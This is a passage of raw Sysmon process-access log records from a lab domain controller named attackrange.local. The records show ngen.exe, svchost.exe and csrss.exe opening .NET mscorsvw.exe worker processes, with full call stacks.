13:25:43.337{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4657-6000-FC03-000000009A01}4184C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008136Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:43.181{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4657-6000-FB03-000000009A01}4824C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008135Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:43.165{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4657-6000-FB03-000000009A01}4824C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008134Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:43.165{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4657-6000-FB03-000000009A01}4824C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008181Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:44.931{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4658-6000-0A04-000000009A01}1036C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008180Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:44.915{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4658-6000-0A04-000000009A01}1036C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008179Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:44.915{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4658-6000-0A04-000000009A01}1036C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008178Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:44.837{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4658-6000-0904-000000009A01}4688C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008177Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:44.822{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4658-6000-0904-000000009A01}4688C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008176Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:44.822{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4658-6000-0904-000000009A01}4688C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008175Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:44.759{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4658-6000-0804-000000009A01}2868C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008174Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:44.744{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4658-6000-0804-000000009A01}2868C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008173Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:44.744{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4658-6000-0804-000000009A01}2868C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008172Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:44.665{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4658-6000-0704-000000009A01}4552C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008171Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:44.650{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4658-6000-0704-000000009A01}4552C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008170Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:44.650{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4658-6000-0704-000000009A01}4552C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008169Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:44.165{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4658-6000-0604-000000009A01}4336C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008168Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:44.150{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4658-6000-0604-000000009A01}4336C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008167Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:44.150{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4658-6000-0604-000000009A01}4336C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008166Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:44.072{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4658-6000-0504-000000009A01}4804C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008165Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:44.056{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4658-6000-0504-000000009A01}4804C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008164Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:44.056{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4658-6000-0504-000000009A01}4804C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008163Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 